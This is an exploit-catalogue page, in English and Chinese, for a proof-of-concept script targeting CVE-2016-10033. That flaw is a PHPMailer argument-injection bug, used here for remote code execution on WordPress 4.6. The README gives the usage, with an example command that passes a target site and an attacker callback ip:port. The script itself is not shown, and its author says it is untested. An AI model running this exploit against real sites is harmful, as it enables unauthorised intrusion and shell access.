CVE-2016-10033 PoC — PHPMailer 安全漏洞

Source

https://github.com/GeneralTesler/CVE-2016-10033

Associated Vulnerability

Title:PHPMailer 安全漏洞 (CVE-2016-10033)
Description:PHPMailer是一个用于发送电子邮件的PHP类库。 PHPMailer 5.2.18之前的版本中的isMail transport的‘mailSend’函数存在安全漏洞，该漏洞源于程序没有设置Sender属性。远程攻击者可利用该漏洞向邮件命令中传递额外的参数，并执行任意代码。

Description

RCE against WordPress 4.6; Python port of https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html

Readme

# PoC for CVE-2016-10033

**RCE against WordPress 4.6**

usage:
```
./CVE-2016-10033.py <target site> <your ip:port> <username>
```
example: 
```
./CVE-2016-10033.py http://site.com/ 1.2.3.4:4444 admin
```

---

Python port (+alterations) of https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html 

Required: Requests (pip install requests)

---

I haven't had the chance to test this so please let me know about your results

File Snapshot


 [4.0K]  /data/pocs/edb74633278ef0670d5fedd7f026fe43d151ac6d
├── [2.6K]  CVE-2016-10033.py
└── [ 453]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!